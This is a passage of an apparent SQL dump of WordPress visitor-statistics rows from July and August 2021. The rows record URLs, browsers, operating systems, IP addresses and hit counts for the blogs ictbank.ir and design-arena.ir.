(12579,'2021-07-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(12580,'2021-07-31','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.142','000',0,2,0),
(12581,'2021-07-31','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','103.80.210.250','000',0,2,0),
(12582,'2021-07-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12583,'2021-07-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(12584,'2021-07-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12585,'2021-07-31','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(12586,'2021-07-31','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','204.236.192.2','000',0,1,0),
(12587,'2021-07-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.138.229','000',0,2,0),
(12588,'2021-07-31','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','77.222.117.245','000',0,1,0),
(12589,'2021-07-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','190.123.219.11','000',0,2,0),
(12590,'2021-07-31','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','192.3.240.168','000',0,13,0),
(12591,'2021-07-31','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','45.95.39.168','000',0,2,0),
(12592,'2021-07-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(12593,'2021-07-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.230.230','000',0,1,0),
(12594,'2021-07-31','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','91.235.227.105','000',0,2,0),
(12595,'2021-07-31','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','18.119.157.92','000',0,4,0),
(12596,'2021-07-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12597,'2021-07-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.47.104','000',0,1,0),
(12598,'2021-07-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(12599,'2021-07-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(12600,'2021-07-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12601,'2021-07-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(12602,'2021-08-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(12603,'2021-08-01','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.178','000',0,2,0),
(12604,'2021-08-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(12605,'2021-08-01','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(12606,'2021-08-01','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','103.229.46.82','000',0,2,0),
(12607,'2021-08-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.222.28','000',0,2,0),
(12608,'2021-08-01','http://82.102.9.14/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','2.57.122.9','000',0,5,0),
(12609,'2021-08-01','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','52.14.75.162','000',0,1,0),
(12610,'2021-08-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(12611,'2021-08-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.166.30','000',0,1,0),
(12612,'2021-08-01','http://www.ictbank.ir/blog','Chrome','OS X','10.11.3',NULL,NULL,'','157.245.126.162','000',0,25,0),
(12613,'2021-08-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','157.245.79.36','000',0,1,0),
(12614,'2021-08-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.241','000',0,1,0),
(12615,'2021-08-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(12616,'2021-08-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(12617,'2021-08-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12618,'2021-08-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12619,'2021-08-02','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','121.28.4.186','000',0,6,0),
(12620,'2021-08-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(12621,'2021-08-02','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','181.64.13.183','000',0,2,0),
(12622,'2021-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.126.102','000',0,2,0),
(12623,'2021-08-02','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','154.160.21.217','000',0,2,0),
(12624,'2021-08-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12625,'2021-08-02','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','27.115.124.36','000',0,2,0),
(12626,'2021-08-02','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.99','000',0,1,0),
(12627,'2021-08-02','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.90','000',0,1,0),
(12628,'2021-08-02','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','117.50.110.69','000',0,1,0),
(12629,'2021-08-02','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.252','000',0,1,0),
(12630,'2021-08-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.157.38','000',0,1,0),
(12631,'2021-08-02','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','46.191.249.0','000',0,1,0),
(12632,'2021-08-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(12633,'2021-08-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(12634,'2021-08-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(12635,'2021-08-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(12636,'2021-08-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,2,0),
(12637,'2021-08-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.88.24','000',0,3,0),
(12638,'2021-08-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','94.102.49.193','000',0,2,0),
(12639,'2021-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
(12640,'2021-08-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.72','000',0,2,0),
(12641,'2021-08-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(12642,'2021-08-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(12643,'2021-08-03','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.203.73.198','000',0,1,0),
(12644,'2021-08-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12645,'2021-08-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(12646,'2021-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.34.136.205','000',0,2,0),
(12647,'2021-08-03','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','222.243.111.35','000',0,2,0),
(12648,'2021-08-03','http://ictbank.ir/blog','Safari','iOS','14.7',NULL,NULL,'','37.44.62.146','000',0,1,0),
(12649,'2021-08-03','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','180.243.14.46','000',0,2,0),
(12650,'2021-08-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.130','000',0,2,0),
(12651,'2021-08-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.164.230','000',0,1,0),
(12652,'2021-08-03','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.76','000',0,3,0),
(12653,'2021-08-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(12654,'2021-08-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(12655,'2021-08-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(12656,'2021-08-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(12657,'2021-08-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(12658,'2021-08-03','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','79.178.159.163','000',0,2,0),
(12659,'2021-08-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.110.186','000',0,1,0),
(12660,'2021-08-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.138','000',0,2,0),
(12661,'2021-08-04','http://ictbank.ir/blog','Chrome','Fedora','Unknown',NULL,NULL,'','181.167.32.83','000',0,4,0),
(12662,'2021-08-04','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(12663,'2021-08-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(12664,'2021-08-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,2,0),
(12665,'2021-08-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.151.178.180','000',0,1,0),
(12666,'2021-08-04','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.232.120.186','000',0,2,0),
(12667,'2021-08-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(12668,'2021-08-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12669,'2021-08-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.171.17','000',0,2,0),
(12670,'2021-08-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.196.2','000',0,1,0),
(12671,'2021-08-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.142.247','000',0,1,0),
(12672,'2021-08-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.249.133.142','000',0,2,0),
(12673,'2021-08-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12674,'2021-08-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.47.104','000',0,1,0),
(12675,'2021-08-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,2,0),
(12676,'2021-08-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(12677,'2021-08-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.206.31','000',0,1,0),
(12678,'2021-08-04','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.108','000',0,2,0),
(12679,'2021-08-04','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','34.246.163.6','000',0,1,0),
(12680,'2021-08-04','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','205.185.222.147','000',0,2,0),
(12681,'2021-08-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12682,'2021-08-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.236.119','000',0,2,0),
(12683,'2021-08-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(12684,'2021-08-05','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','54.229.186.144','000',0,1,0),
(12685,'2021-08-05','http://ictbank.ir/blog/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/?unapproved=6&moderation-hash=82ffdd327e52539aa1ee721cf2c38173#comment-6','Chrome','Windows','10.0',NULL,NULL,'','95.105.125.236','000',0,5,0),
(12686,'2021-08-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','193.37.255.114','000',0,1,0),
(12687,'2021-08-05','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','52.18.200.220','000',0,1,0),
(12688,'2021-08-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.87.188.202','000',0,1,0),
(12689,'2021-08-05','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','49.12.126.16','000',0,9,0),
(12690,'2021-08-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12691,'2021-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.249.82.194','000',0,1,0),
(12692,'2021-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.220.59','000',0,2,0),
(12693,'2021-08-05','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','180.179.207.191','000',0,4,0),
(12694,'2021-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.42.160.39','000',0,1,0),
(12695,'2021-08-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.107.8','000',0,1,0),
(12696,'2021-08-05','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','52.212.142.222','000',0,1,0),
(12697,'2021-08-05','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','123.28.202.251','000',0,2,0),
(12698,'2021-08-05','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.49.19','000',0,4,0),
(12699,'2021-08-05','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','172.104.9.42','000',0,2,0),
(12700,'2021-08-05','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','188.212.246.184','000',0,4,0),
(12701,'2021-08-05','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','77.222.117.245','000',0,1,0),
(12702,'2021-08-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(12703,'2021-08-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(12704,'2021-08-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12705,'2021-08-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(12706,'2021-08-05','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(12707,'2021-08-05','http://ictbank.ir/blog/wp-login.php?redirect_to=http%3A%2F%2Fictbank.ir%2Fblog%2Fwp-admin%2F&reauth=1','Chrome','OS X','10.15.7',NULL,NULL,'','79.127.96.129','000',0,1,0),
(12708,'2021-08-05','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.226.47.120','000',0,1,0),
(12709,'2021-08-06','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','37.111.128.65','000',0,2,0),
(12710,'2021-08-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(12711,'2021-08-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12712,'2021-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.135.55','000',0,2,0),
(12713,'2021-08-06','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','77.222.117.245','000',0,2,0),
(12714,'2021-08-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.9.90','000',0,1,0),
(12715,'2021-08-06','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(12716,'2021-08-06','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','150.255.5.254','000',0,1,0),
(12717,'2021-08-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(12718,'2021-08-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(12719,'2021-08-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.222.72','000',0,1,0),
(12720,'2021-08-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(12721,'2021-08-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(12722,'2021-08-06','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','157.100.173.94','000',0,2,0),
(12723,'2021-08-06','http://design-arena.ir/blog/','Opera','Windows','6.1',NULL,NULL,'','37.19.223.220','000',0,3,0),
(12724,'2021-08-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(12725,'2021-08-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.237','000',0,2,0),
(12726,'2021-08-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','193.189.100.199','000',0,1,0),
(12727,'2021-08-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','193.32.126.161','000',0,1,0),
(12728,'2021-08-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.204.124','000',0,1,0),
(12729,'2021-08-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(12730,'2021-08-07','http://82.102.9.14:80/blog','Chrome','OS X','10.14.6',NULL,NULL,'','167.71.205.125','000',0,4,0),
(12731,'2021-08-07','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,2,0),
(12732,'2021-08-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,4,0),
(12733,'2021-08-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.78.129','000',0,2,0),
(12734,'2021-08-07','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','125.162.215.132','000',0,2,0),
(12735,'2021-08-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.237.138','000',0,1,0),
(12736,'2021-08-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(12737,'2021-08-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(12738,'2021-08-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.3.62','000',0,1,0),
(12739,'2021-08-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(12740,'2021-08-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(12741,'2021-08-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(12742,'2021-08-08','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','34.244.159.115','000',0,2,0),
(12743,'2021-08-08','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','187.44.134.182','000',0,2,0),
(12744,'2021-08-08','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(12745,'2021-08-08','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.132.58.119','000',0,2,0),
(12746,'2021-08-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','193.107.216.34','000',0,2,0),
(12747,'2021-08-08','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','95.105.125.236','000',0,2,0),
(12748,'2021-08-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(12749,'2021-08-08','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.81.67.199','000',0,2,0),
(12750,'2021-08-08','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','84.241.35.195','000',0,2,0),
(12751,'2021-08-08','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','18.202.237.21','000',0,2,0),
(12752,'2021-08-08','anonymousfox.co','Chrome','Windows','10.0',NULL,NULL,'','37.0.10.15','000',0,1,0),
(12753,'2021-08-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.114.80','000',0,2,0),
(12754,'2021-08-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12755,'2021-08-08','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.226.251.82','000',0,1,0),
(12756,'2021-08-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.56.165','000',0,1,0),
(12757,'2021-08-08','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','31.13.195.71','000',0,3,0),
(12758,'2021-08-08','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.193','000',0,1,0),
(12759,'2021-08-08','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.232','000',0,1,0),
(12760,'2021-08-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(12761,'2021-08-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','167.71.11.97','000',0,1,0),
(12762,'2021-08-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(12763,'2021-08-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(12764,'2021-08-08','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.19.40','000',0,5,0),
(12765,'2021-08-08','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(12766,'2021-08-08','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','112.134.173.236','000',0,2,0),
(12767,'2021-08-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(12768,'2021-08-09','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','18.215.126.228','000',0,1,0),
(12769,'2021-08-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,12,0),
(12770,'2021-08-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(12771,'2021-08-09','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','188.123.126.151','000',0,4,0),
(12772,'2021-08-09','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','36.66.124.195','000',0,2,0),
(12773,'2021-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.69.12','000',0,2,0),
(12774,'2021-08-09','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(12775,'2021-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.178.20','000',0,1,0),
(12776,'2021-08-09','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','190.205.3.126','000',0,2,0),
(12777,'2021-08-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.110.166.242','000',0,1,0),
(12778,'2021-08-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(12779,'2021-08-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,2,0),
(12780,'2021-08-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(12781,'2021-08-10','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.250','000',0,2,0),
(12782,'2021-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(12783,'2021-08-10','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.91.69.51','000',0,2,0),
(12784,'2021-08-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','197.229.2.36','000',0,1,0),
(12785,'2021-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','165.227.104.168','000',0,1,0),
(12786,'2021-08-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.198.18','000',0,2,0),
(12787,'2021-08-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','165.22.200.59','000',0,2,0),
(12788,'2021-08-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(12789,'2021-08-10','http://ictbank.ir/blog','Chrome','OS X','10.15.6',NULL,NULL,'','34.241.184.188','000',0,1,0),
(12790,'2021-08-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(12791,'2021-08-10','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.108','000',0,2,0),
(12792,'2021-08-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.50.79','000',0,1,0),
(12793,'2021-08-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','105.235.122.218','000',0,1,0),
(12794,'2021-08-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(12795,'2021-08-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(12796,'2021-08-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(12797,'2021-08-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(12798,'2021-08-10','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','110.52.184.49','000',0,2,0),
(12799,'2021-08-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.3.110.195','000',0,2,0),
(12800,'2021-08-10','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','156.208.100.132','000',0,2,0),
(12801,'2021-08-10','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
